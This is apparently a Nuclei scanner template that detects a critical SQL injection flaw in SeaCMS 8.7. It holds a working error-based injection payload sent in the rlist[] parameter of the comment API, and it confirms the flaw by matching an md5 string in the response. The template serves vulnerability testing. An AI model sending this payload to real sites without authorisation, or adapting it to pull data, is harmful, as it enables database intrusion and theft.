38 lines
1007 B
YAML
38 lines
1007 B
YAML
|
id: seacms-sqli
|
||
|
|
||
|
info:
|
||
|
name: SeaCMS 8.7 - SQL Injection
|
||
|
author: ritikchaddha
|
||
|
severity: critical
|
||
|
description: SeaCMS 8.7 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
||
|
reference:
|
||
|
- https://www.uedbox.com/post/54561/
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||
|
cvss-score: 10.0
|
||
|
cwe-id: CWE-89
|
||
|
tags: seacms,sqli
|
||
|
|
||
|
variables:
|
||
|
num: "999999999"
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`"
|
||
|
|
||
|
host-redirects: true
|
||
|
max-redirects: 2
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- '{{md5({{num}})}}'
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
# Enhanced by mp on 2022/09/28
|